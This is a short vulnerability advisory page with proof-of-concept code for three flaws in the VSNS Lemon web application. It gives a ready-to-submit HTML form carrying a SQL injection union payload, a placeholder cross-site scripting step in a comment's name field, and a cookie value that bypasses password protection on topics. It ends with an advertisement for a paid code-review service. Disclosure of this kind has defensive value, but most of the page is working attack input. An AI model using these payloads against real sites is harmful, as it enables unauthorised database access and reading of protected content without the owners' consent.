PoC/Exploit for Multiple Vulnerabilities in VSNS Lemon

Published Proof of Concept code - Multiple Vulnerabilities in VSNS Lemon.

Description
Available
Solution
Not available - check Tachyon website

1. SQL Injection Example.

  • <form method="post" action="http://[host]/vsns/index.php">
  • <input type="hidden" name="towel" value="checkpass">
  • <input name="id" value="9999' union select 123,4,5,6/*">
  • <input type="password" name="password" value="123">
  • <input type="submit" value="Go">
  • </form>

2. Cross-Site Scripting Example

Add Comment.

Example URL: http://[host]/vsns/index.php?towel=archive&type=id&id=1#vsns_comments_display

Name: [XSS]

3. Authentication Bypass Example.

Read any password-protected topic:

Cookie: vsns[topic_id] = 1

Order Source Code Analysis made by eVuln team

Protect against attacks by PHP code review of your website made by our team.The task will be done by specialists in web application security.

Advisories by vuln type